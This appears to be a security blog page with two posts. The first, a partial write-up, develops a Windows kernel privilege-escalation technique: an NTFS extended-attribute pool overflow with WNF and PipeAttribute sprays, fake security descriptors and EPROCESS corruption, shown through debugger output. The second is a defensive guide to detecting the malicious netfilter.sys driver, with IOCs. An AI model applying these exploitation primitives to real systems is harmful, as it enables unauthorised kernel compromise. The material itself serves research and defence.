 ffff9a82c1cd4060 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4090 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4120 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4150 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4180 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4210 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4240 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4270 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4300 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4330 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4360 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4390 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4420 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4450 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4480 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4510 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4540 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4570 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4600 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4630 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4660 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4690 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4720 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4750 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4780 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4810 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4840 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4870 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4900 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4930 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4960 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4990 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49f0 size:   30 previous size:    0  (Free)       NtFE
*ffff9a82c1cd4a20 size:  220 previous size:    0  (Allocated) *Wnf  Process: ffff8608b72bf080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffff9a82c1cd4c30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080

However, the main thing here is the ability to find a more interesting object to corrupt. As a quick win, the PipeAttribute object from the great paper https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf was also used.

typedef struct pipe_attribute {
    LIST_ENTRY list;
    char* AttributeName;
    size_t ValueSize;
    char* AttributeValue;
    char data[0];
} pipe_attribute_t;

As PipeAttribute chunks are also a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative write’s.

Using this layout we can corrupt the PipeAttribute‘s Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.

Diagramatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.

The journey to arbitrary write

After taking a step back after this minor Pipe Attribute detour and with the realisation that I could actually control the size of the vulnerable NTFS chunks. I started to investigate if it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur in, then the bounds checking within the ExpWnfWriteStateData would be successful.

Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:

So the aim is to have the following occurring:

We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.

Therefore can end up with our desired memory layout with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

 ffffdd09b35c8010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c80d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
*ffffdd09b35c8250 size:   c0 previous size:    0  (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffffdd09b35c8310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080       
 ffffdd09b35c83d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c86d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8910 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c89d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080

We can see before the corruption the following structure values:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

Then after our NTFS extended attributes overflow has occurred and we have overwritten a number of fields:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

For example, the StateData pointer has been modified to hold the address of an EPROCESS structure:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)                 : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header           [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize    : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize         : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp      : 0xffff8d87 [Type: unsigned long]


PROCESS ffff8d87686c8080
    SessionId: 1  Cid: 1760    Peb: 100371000  ParentCid: 1210
    DirBase: 873d5000  ObjectTable: ffffdd09b2999380  HandleCount:  46.
    Image: TestEAOverflow.exe

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address. At this was used within the in the wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and this could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful StateName lookup, the internal state name needs to match the external name queried from.

At this stage it is worth going into the StateName lookup process in more depth.

As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

There is the external version of the StateName which is the internal version of the StateName XOR’d with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))                 [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version          : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime     : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope        : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData    : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence         : 0x1a33 [Type: unsigned __int64]
1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348  00d19931

Or in bitwise operations:

Version = InternalName & 0xf
LifeTime = (InternalName >> 4) & 0x3
DataScope = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence = InternalName >> 0xb

The key thing to realise here is that whilst Version, LifeTime, DataScope and Sequence are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.

As you can see from the below, based on the DataScope the current server Silo Globals or the Server Silo Globals are offset into to obtain v10 and then this used as the Sequence which is incremented by 1 each time.

Then in order to lookup a name instance the following code is taken:

i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as this is outside of the _RTL_BALANCED_NODE rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.

Each of the _WNF_NAME_INSTANCE are joined together with the TreeLinks element. Therefore the tree traversal code above walks the AVL tree and uses it to find the correct StateName.

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateName‘s of the objects which have been heap sprayed, you don’t necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure’s StateName to be.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers, however, the main caveat with that is that care needs to be taken to avoid safe unlinking protection occurring.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due the security descriptor.

Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.

Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.

Kernel space:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)                 : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0x800c [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x28000200000014 [Type: void *]
    [+0x018] Sacl             : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl             : 0x101001f0013 [Type: _ACL *]

After repointing the security descriptor to the userland structure:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)                 : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0xc [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x0 [Type: void *]
    [+0x018] Sacl             : 0x0 [Type: _ACL *]
    [+0x020] Dacl             : 0x23ee3ab4350 [Type: _ACL *]

I then attempted to provide the fake the security descriptor with the same values. This didn’t work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790).

Ok then! Lets just make the DACL NULL, so that the everyone group has Full Control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
sd->Revision = 0x1;
sd->Sbz1 = 0;
sd->Control = 0x800c;
sd->Owner = 0;
sd->Group = (PSID)0;
sd->Sacl = (PACL)0;
sd->Dacl = (PACL)0;

EPROCESS Corruption

Initially when testing out the arbitrary write, I was expecting that when I set the StateData pointer to be 0x6161616161616161 a kernel crash near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, this is caught and the NT status -1073741819 which is STATUS_ACCESS_VIOLATION is propagated back to userland. This made initial debugging more challenging, as the code around that function was a significantly hot path and with conditional breakpoints lead to a huge program standstill.

Anyhow, typically after achieving an arbitrary write an attacker will either leverage to perform a data-only based privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.

To recap, the following steps were needing to be taken:

1) The internal StateName matched up with the correct internal StateName so the correct external StateName can be found when required.
2) The Security Descriptor passing the checks in ExpWnfCheckCallerAccess.
3) The offsets of DataSize and AllocSize being appropriate for the area of memory desired.

So in summary we have the following memory layout after the overflow has occurred and the EPROCESS being treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

PROCESS ffff8881dc84e0c0
    SessionId: 1  Cid: 13fc    Peb: c2bb940000  ParentCid: 1184
    DirBase: 4444444444444444  ObjectTable: ffffc7843a65c500  HandleCount:  39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1  Cid: 073c    Peb: f143966000  ParentCid: 13fc
    DirBase: 135d92000  ObjectTable: ffffc7843a65ba40  HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0  Cid: 0448    Peb: 825b82f000  ParentCid: 028c
    DirBase: 37daf000  ObjectTable: ffffc7843ec49100  HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffffd68c
   +0x008 DataSize         : 0x100
   +0x00c ChangeStamp      : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0  00000003 00000000 dc84e0c8 ffff8881  ................
ffff8881`dc84e0d0  00000100 41414142 44444444 44444444  ....BAAADDDDDDDD
ffff8881`dc84e0e0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e100  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e110  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e120  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e130  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e140  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e150  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e160  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e170  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e180  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e190  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0  44444444 44444444 00000000 00000000  DDDDDDDD........
ffff8881`dc84e1e0  00000000 00000000 00000000 00000000  ................
ffff8881`dc84e1f0  00000000 00000000 00000000 00000000  ................

As you can see, EPROCESS+0x8 has been corrupted with attacker controlled data.

At this point typical approaches would be to either:

1) Target KTHREAD structures PreviousMode member

2) Target the EPROCESS token

These approaches and pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

In summary we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitive. That is all for now in part 1! In the next blog I will cover reliability improvements, kernel memory clean up and continuation.

Detecting and Hunting for the Malicious NetFilter Driver

16 July 2021 at 21:26

Category:  Detection and Threat Hunting

Overview

During the week of June 21st, 2021, information security researchers from G Data discovered that a driver for Microsoft Windows named “netfilter.sys” had a backdoor added by a 3rd party that Microsoft then signed as a part of the Microsoft OEM program.  The malicious file is installed on a victim’s system as a component of an attack as part of the post-exploitation process. This means that the attacker must either have gained administrative privileges or already had access to run the installer to update the registry and install the malicious driver. This can occur during the post-exploitation process or set up to install the next time the system starts. Additionally, the victim can be convinced to install the driver as part of a pretexting attack.  At present, Microsoft has not seen the enterprise environment targeted, rather individual users at this time.

The following details are provided to assist organizations in detecting and threat hunting for this specific threat and other similar types of threats.

Investigating Malicious Drivers

Several tools can be used to check systems for indications of malicious drivers.  For example, tools such as SysInternals Autoruns and LOG-MD can investigate autoruns or persistence entries, with drivers being one type of persistence on a Windows server and workstation systems.

On a Windows system, drivers tend to be loaded from typically three locations:

  • C:\Windows\System32\Drivers
  • C:\WINDOWS\system32\DriverStore\FileRepository
  • Applications installed directory typically under “Program Files” or “Program Files x86”.

The malicious netfilter driver, in this case, can be found in a folder that drivers should never exist.  The odd driver location is a good artifact for execution detection and threat hunting. Any binary found in the following folder should be investigated:

  • %AppData% – C:\Users\<username>\AppData\Roaming

Windows also provides a built-in utility “driverquery” that can list the drivers, the state of the driver (running or stopped), and the driver’s key (location from which the driver was loaded).  To get a list of all the drivers of a system into CSV format that can then be opened in Microsoft Excel, execute the following command in an administrative command prompt:

  • driverquery /v /fo CSV | find /i /v “system32\drivers\” | find /i /v “driverstore” > C:\Windows\Temp\Driver_List_%computername%.csv

This command will filter out the two primary locations drivers are loaded, providing a short list of drivers on the system that should be investigated.  This command also includes the name of the system appended to the output filename to allow for easier review of artifacts collected from multiple systems.

Detection

Detecting the netfilter driver and similar malicious payloads is as simple as looking for binaries and drivers loaded from atypical locations. Add a rule to your SIEM, log management, EDR, or similar security tooling that looks for process execution (event ID 4688 of the Windows security log) from the following locations:

  • C:\Program Files
  • C:\Program Files x86
  • C:\ProgramData
  • %AppData% – C:\Users\<username>\AppData\Roaming
  • %LocalAppData% – C:\Users\<username>\AppData\Local

In order to collect event ID 4688, the Windows Advanced Audit Policy will need to have the following policy enabled:

  • Detailed Tracking – Audit Process Creation

We hope this information can assist in your detection and threat hunting efforts to detect this and similar types of attacks.

IOCs

The following indicators of compromise (IOCs) are provided to help in detection and threat hunting activities.

Folders the file(s) can be found

  • %AppData% – C:\Users\<username>\AppData\Roaming

Filenames

  • Netfilter.sys
  • Sdl.sys
  • File.sys

IP Addresses

  • 110.42.4[.]180
  • 45.113.202[.]180

File Hashes

  • 04a269dd0a03e32e5b2a1c8ab0768791962e040d080d44dc44dab01dd7954f2b
  • 0856a1da15b2b3e8999bf9fc51bbdedd4051e21fab1302e2ce766180b4931d86
  • 0c42fe45ffa9a9c36c87a7f01510a077da6340ffd86bf8509f02c6939da133c5
  • 0eace788e09c8d3f793a1fad94d35bcfd233f0777873412cd0c8172865562eec
  • 115034373fc0ec8f75fb075b7a7011b603259ecc0aca271445e559b5404a1406
  • 12656fc113b178fa3e6bfffc6473897766c44120082483eb8059ebff29b5d2df
  • 12c0002af719c6abbc1e726b409fce099fffb90f758477f5295c152bde504caa
  • 16b6be03495a4f4cf394194566bb02061fba2256cc04dcbde5aa6a17e41b7650
  • 18b923b169b2c3c7db5cbfda0db0999f04adb2cf6c917e5b1fb2ff04714ecac1
  • 1aa8ba45f9524847e2a36c0dc6fd80162923e88dc1be217dde2fb5894c65ff43
  • 1cd75de5f54b799b60789696587b56a4a793cf60775b81f236f0e65189d863af
  • 1d1f7e26109e6cb28c6b369c937b407d7b0cce3c4800ce9852eda94742b12259
  • 1d60819f0ab8547dcd4eb18d39a0c317ec826332afa19c0a6af94bc681a21f14
  • 1f05f74ebae7e65d389703d423445ffb269e657d8278b0523417e1f72b0228eb
  • 1f90d9c4d259c1fde4c7bb66a95d71ea0122e4dfb75883a6cb17b5c80ce6d18a
  • 22da5a055b7b17c69def9f5af54e257c751507e7b6b9a835fcf6245ab90ae750
  • 22f6fe6bd62fb03f7aee489cccbc918999f49596052ac0153c02cd7a3320de13
  • 23c061933d471c1f959c77806098ec0528d9b1d0130689bb3f417dd843138468
  • 24ea733bae1b8722841fb4c6cead93c4c4f0b1248ca9a21601b1ce6b95b06864
  • 26d67d479dafe6b33c980bd1eed0b6d749f43d05d001c5dcaaf5fcddb9b899fe
  • 26f2b9cf6e0fb50bad49a367bee63e808f1d53c476b38642d13c7db6e50687f4
  • 2fa78c2988f9580b0c18822b117d065fb419f9c476f4cfa43925ba6cd2dffac3
  • 314affdc86f62c8f8069ccd50a2cdf73bcd319773a031be700ba97a1ea4129a8
  • 34c890fa43ca0e5165a4960549828ba43d7f48a216a22fc46204548ebfc34f72
  • 3700b38d63d426ff0a985226b45eca6e24d052f4262d12aff529e62c2cb889c3
  • 40c45c9b1c764777096b59f99ae524cbd25b88c805187e615c3ed6840f3d4c15
  • 45ee083e28fbb33afa41b1b8cd00d94c29dea8cb7cee70bae4079e6c3dfb5501
  • 4ce61ad21f186cf10dbcc253feee31262203cb5c12c5a140d2dda5447c57aba1
  • 516159871730b18c2bddedb1a9da110577112d4835606ee79bb80e7a58784a13
  • 5cb1dc26159c6700d6cadece63f6defda642ec1a6d324daefb0965b4e3746f70
  • 5d0d5373c5e52c4405f4bd963413e6ef3490b7c4c919ec2d4e3fb92e91f397a0
  • 62d7c5465852cdb7b59a86c20b4de5991c8f4820ce11a7c01cf0dde6032e500d
  • 630d7bdc20f33e6f822f52533a324865694886b7b74dfaad1dc30c9aee4260a2
  • 635273eaa4c2e20c4ec320c6c8447ce2e881984e97c9ed6aeec4fad16b934e81
  • 63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0
  • 640eeb3128ae5c353034ee29cb656d38c41353743396c1c936afd4d04a782087
  • 6703400b490b35bcde6e41ce1640920251855e6d94171170ae7ea22cdd0938c0
  • 6a234a2b8eb3844f7b5831ee048f88e8a76e9d38e753cc82f61b234c79fe1660
  • 6a6db5febdaf3f1577bf97c6e1e24913e6c78b134062c02fd1f9875099c03a3f
  • 6c7f24d8ed000bc7ce842e4875b467f9de1626436e051bd351adf1f6f8bbacf8
  • 70b63dfc3ed2b89a4eb8a0aa6c26885f460e5686d21c9d32413df0cdc5f962c7
  • 79e7165e626c7bde546cd1bea4b9ec206de8bed7821479856bdb0a2adc3e3617
  • 7ff8fe4c220cf6416984b70a7e272006a018e5662da3cedc2a88efeb6411b4a4
  • 8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870
  • 8e0b330a8df3076153638f5b76afc24d1083ebccc60e4d63ee0df5c11c45d58a
  • 93d99a5fbfc888c0a40a18946933121ae110229dcf206b4d17116a57e7cf4dc9
